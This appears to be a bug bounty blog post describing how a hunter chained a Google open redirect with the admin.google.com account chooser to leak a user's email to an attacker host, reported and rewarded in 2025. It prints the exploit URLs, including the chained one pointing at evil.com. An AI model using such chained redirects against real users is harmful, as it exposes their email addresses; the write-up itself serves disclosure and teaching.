July 10, 2026
How I Chained an Open Redirect into Email Leak and Got $1,337 from Google
Who Am I?

By xlsizebruh
2 min read
Who Am I?
Hi! I'm Pratyush Dutta, a 17yo old Bug Bounty hunter. I started last year and this bug turned out to be a fun and rewarding oneπ( I wrote this article in 2025 but never published it. Please ignore if my writing style is bad it dates back to 2025 π)
How it all started (2024) :
About a year ago(2024), while hunting on Google, I discovered an open redirect endpoint:
https://adservice.google.com/ddm/clk/424929466;226923624;r;;%3F//evil.com/auth/https://adservice.google.com/ddm/clk/424929466;226923624;r;;%3F//evil.com/auth/I was super excited! But as I started writing a report to Google I realized that Google doesn't accept open redirects π. A bit disappointed and demotivated I saved the URL in a **.txt** file and moved on.
At that time, I couldn't dedicate much time to bug hunting because of my upcoming board exams so I didn't make much progress.
May 31st, 2025 Midnight Curiosity :
It was around 2 a.m. I was poking around **admin.google.com** and thought :
"How could the admin page of Google possibly be vulnerable?"
I noticed a **continue** parameter in the URL:
https://admin.google.com/ac/accountchooser?continue={url}https://admin.google.com/ac/accountchooser?continue={url}I tried injecting **https://evil.com** into **{url}**, but as expected, it didn't work.
Out of curiosity, I replaced it with **https://evil.google.com** and surprisingly, it worked!
It redirected me to **https://evil.google.com** (ofc a 404 subdomain of Google).
BUT the twist? Whichever account the user clicked, the email address got appended to the redirect:
https://evil.google.com/?authuser=victim@gmail.comhttps://evil.google.com/?authuser=victim@gmail.comWhat I Learned :
- The
**continue**parameter accepts all subdomains under**google.com**. - The user's email (
**authuser**) gets appended to the redirected URL.
Connecting the Dots :
Now the question was : How do I exploit this?
Then it hit me : what if I used the old open redirect I had found a year ago?
I quickly searched for the **.txt** file where I saved the URL. Luckily, I found it easily. I combined the **admin.google.com** URL with the open redirect:
https://admin.google.com/ac/accountchooser?continue=https://adservice.google.com/ddm/clk/424929466;226923624;r;;%3F//evil.com/auth/https://admin.google.com/ac/accountchooser?continue=https://adservice.google.com/ddm/clk/424929466;226923624;r;;%3F//evil.com/auth/And it worked! Since **adservice.google.com** is a Google subdomain, the system allowed it.
And because it redirected to **evil.com**, I was able to leak the victim's email to an attacker-controlled URL!
I immediately reported it to Google! And it got triaged the same day :)
Later I realized that what I found was actually a bypass of a previous fix! The same bug was mentioned in LiveOverflow's YouTube video:
- Triaged : 06:56 | May 31, 2025
- Accepted : 23:11 | Jun 3, 2025
- And about three weeks later, the panel decided to award me $1337!
Conclusion :
Always try to connect the dots! This was an amazing experience for me. A huge shout-out to Google's security team for all their efforts. Thanks for reading this article. I hope this could be useful to you in some way. Goodluck with your BB Journey!